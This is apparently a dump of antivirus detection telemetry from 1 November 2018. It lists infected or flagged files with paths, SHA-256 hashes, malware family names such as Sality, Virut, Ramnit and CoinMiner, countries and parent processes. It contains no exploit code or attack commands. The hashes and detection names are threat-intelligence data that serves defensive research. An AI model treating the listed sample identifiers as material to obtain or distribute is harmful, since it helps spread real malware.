  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110246-366d1873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110246-366D1873', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-31-07-04-18.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110320-775cd691', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105548-25D20D21\\AVSCAN-20181101-110320-775CD691', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-08-06-45.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T10:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155318-a6887802', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155318-A6887802', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154652-658d945c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154652-658D945C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T22:09:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tahunan 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\LPA\\LAPORAN TAHUNAN 2015\\TAHUNAN 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diana asamoah.exe', filepath='D:\\Diana Asamoah.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:34:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mi-agenda-personal-programas-gratis-net_2309201249.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\mi-agenda-personal-programas-gratis-net_2309201249.exe', filesize=1664000, name='PUA/AD.InstallCore.B.#M1.#R1'), hash='3e59ba4561b40b6d4e4bc1d6638a01bf01b006e25010c592a549fd4ad2a48e8d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:59:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ata emsa .scr', filepath='C:\\Users\\X\\Desktop\\ATA EMSA .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:15:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155255-a290ee5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155255-A290EE5E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160040-f1049543', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160040-F1049543', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\0083963C4655CD66B99064C581EE03F11B581B928CE15DABE95E49B8D3C76AF4', filesize=852000, name='W32/Neshta.A.#M1.#R1'), hash='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:48:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keyinlist.exe', filepath='\\\\?\\C:\\Users\\X\\Dropbox\\FAMA\\keyinlist.exe', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='a6c4120f2e57e2cbdd905bee9047d5e00c5a8e29a9002172fbbcde738b1fe5d0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:40:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\Temp\\msohtml\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\Microsoft.NET\\Framework64\\v3.0\\WPF\\PresentationFontCache.exe', parentsize=42840, timestamp='2018-11-01T04:27:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01015.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\PMC01015.exe', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='8b41cda8d6482a0e2aca27f0fb0b07af12ca04d6688365f245de7ca2da27aec4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baixaki_windows-movie-maker.exe', filepath='E:\\Backup Simone\\Downloads\\Baixaki_windows-movie-maker.exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='6339755c14995cab4a6a6316411952208ced2f960b5a935906237c1e0719bd60', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2870272, timestamp='2018-11-01T16:35:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:15:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='57412b8cd0df4a722642ed3fea8b8e5223eeb57b9c7a1c3c81ce82e64c50ce92', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows.old\\Windows\\Temp\\nsv6D72.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T05:02:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách học đtv.exe', filepath='H:\\\xa0\\USB__Data\\danh sách học ĐTV.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='password_generator_2.0_setup.exe', filepath='H:\\software\\optimierung\\PASSWORD_GENERATOR_2.0_SETUP.EXE', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='664af15df40e1f9e0ad1bb4be5b607d98da5a2ac74b51741e264eb792bd504ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T05:54:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Pixologic ZBrush 4R8 P2 x64 - ENG (11 Agosto 2017) by GRISU\\Pixologic ZBrush 4R8 P2 x64 - ENG (11 Agosto 2017) by GRISU\\Update 2\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T11:34:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='siemens.automation.remoteaccess.s7wtssvx.exe', filepath='\\\\?\\C:\\Program Files\\Siemens\\Automation\\Portal V13\\Bin\\Siemens.Automation.RemoteAccess.s7wtssvx.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='7f7774046fac5e4b5a36e752e6b4b4e9ce26c6c35e30bad14c87724d66203ebf', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:56:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='ee0260544e952c11244cba40bb0b9cd684da26aee741eb4805841c5770f9acb5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110813-e5ca5dc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110813-E5CA5DC7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141446-00ce6ffb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141446-00CE6FFB', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x86.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='b3aa91b8a34ce2c8173512d0d09d7c4429849008c80b7ffbdbcda38ecbaf4cf9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172308-d833750e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172308-D833750E', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='e4a5462414cfe7933695b85b5d7fe27ade4c20e376d8c1d202863f1fa3668465', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:23:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vncutil.exe', filepath='\\\\computer_1\\f\\drivers\\audio\\realtek\\hda\\vncutil.exe', filesize=2560000, name='W32/Chir.B.#M1.#R1'), hash='ee80e0bcffe54883ecf7f5684ea3a412e75f934b442855a9b298e4a4c854f29a', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:01:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='อจท. แผน 3-3 คณิตฯ ม.3 เล่ม 1.doc', filepath='C:\\Users\\X\\Desktop\\New folder\\03.แผนฯ คณิตศาสตร์ ม.3 เล่ม 1\\หน่วย 3 คณิตฯ ม.3 ล.1\\อจท. แผน 3-3 คณิตฯ ม.3 เล่ม 1.doc', filesize=1344000, name='EXP/CVE-2006-4534.#M1.#R1'), hash='e5364f0c0dc446ba810a5587c1f8cca5b3db43dd964f0b8bf1e332a4992af680', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:10:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0367913.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1588\\A0367913.exe', filesize=716000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='b6bd127b950833b585509f556c701c0ffafdd78432267881ebafa1700d2ef82a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:06:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122334-df632acb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122305-C664725D\\AVSCAN-20181101-122334-DF632ACB', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:23:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='C:\\Windows\\System32\\taskeng.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='baae1a15dd2715e61d17b9832c85d3fe77674867157c467655041e945908fee4', metadata=Row(cmdline='-k netsvcs', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:49:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transformers - rise of the dark spark.exe', filepath='F:\\Loaders\\Source\\Oyunlar\\Transformers - Rise of the Dark Spark\\Transformers - Rise of the Dark Spark.exe', filesize=1280000, name='HEUR/AGEN.1000290.#M1.#R1'), hash='488915290fd302f18f6d3aa1adf0e8fc70ad5219bb8cad930ba6292e797c43cd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245280, timestamp='2018-11-01T12:27:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsusbredirectiongrouppolicycontrol.exe', filepath='F:\\Windows\\winsxs\\x86_microsoft-windows-r..s-regkeys-component_31bf3856ad364e35_6.1.7601.17514_none_21d2afd5583776b6\\TsUsbRedirectionGroupPolicyControl.exe', filesize=320000, name='W32/Sality.AG.#M1.#R1'), hash='59002443c353b53dd8d4fe0d477da5ffc1047de78b2c9d089193ed8735ee13f6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:38:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0005503.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0005503.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:16:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2d43a3ec1910e4047b1ec2c047da601cd0c532e3cc3e376150610f6f5db19e4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\2D43A3EC1910E4047B1EC2C047DA601CD0C532E3CC3E376150610F6F5DB19E4C', filesize=184000, name='W32/Elkern.B.#M1.#R1'), hash='2d43a3ec1910e4047b1ec2c047da601cd0c532e3cc3e376150610f6f5db19e4c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:06:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222546-de71b3a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_070199db\\AVSCAN-20181101-222427-D46CAF13\\AVSCAN-20181101-222546-DE71B3A6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T21:19:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='docx2rtf.exe', filepath='j:\\office\\office 2003\\docx2rf\\Docx2Rtf.exe', filesize=3392000, name='W32/Ramnit.CD.#M1.#R1'), hash='4ba1d4de4fb826f24aa75c13925c47fa4f10ae65bcc7f3773e038ca31bebeae7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:02:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Users\\X\\Downloads\\logiciel\\Office Pro 2013\\Crack - KMSpico v4.3 Setup, OEM Directory & Portable\\KMSpico Only Service\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Windows Defender\\MsMpEng.exe', parentsize=105344, timestamp='2018-11-01T11:19:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b3933', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b3933', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:54:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003039-6d957560', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003039-6D957560', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:30:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alienshooter.exe', filepath='E:\\العاب\\Alien Shooter\\AlienShooter.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='1758d8dab8946ca04a861877e9821b4e89b41bc340e549bc412193b502057933', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:12:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gzssz.dll', filepath='D:\\MariaDB\\lib\\plugin\\gzssz.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='27bcd2ea9456476b7ab0881ee7704d030721b09856caa463554d383754cd40e6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T22:29:56Z'), dt=datetime.date(2018, 11, 1)),
